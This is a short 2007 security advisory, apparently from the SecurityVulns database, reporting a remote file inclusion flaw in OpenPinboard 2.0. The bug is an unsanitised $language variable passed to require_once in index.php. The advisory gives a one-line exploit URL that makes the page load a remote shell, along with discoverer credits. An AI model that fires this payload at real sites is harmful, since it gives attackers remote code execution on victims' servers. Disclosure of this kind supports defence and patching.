OpenPinboard <= Remote File Include

2007-01-04T00:00:00
ID SECURITYVULNS:DOC:15572
Type securityvulns
Reporter Securityvulns
Modified 2007-01-04T00:00:00

Description

======================================================================================

OpenPinboard <= Remote File Include

======================================================================================

Scripts: OpenPinboard

Download :http://osdn.dl.sourceforge.net/sourceforge/openpinboard/openpinboard_2.0.tar.gz

Version : 2.0

======================================================================================

)Bug in :( index.php

code : ;(require_once ($language

======================================================================================

Exploit :

http://www.site.com/[script_path]/index.php?language=http://sh3LL?

======================================================================================

Discoverd By : ZooZ

Conatact : zooz_998[at]hotmail.com

Greetz to :

abu_shahad | R00T-shilL | v1per-haCker | alkasergolden | MR-WOLF | abu nawaf | Muhajer22 |cRiMiNaL NeT

cold zero | Barod | bEn_slimAN |

And All Members In tryag and 4azhar

======================================================================================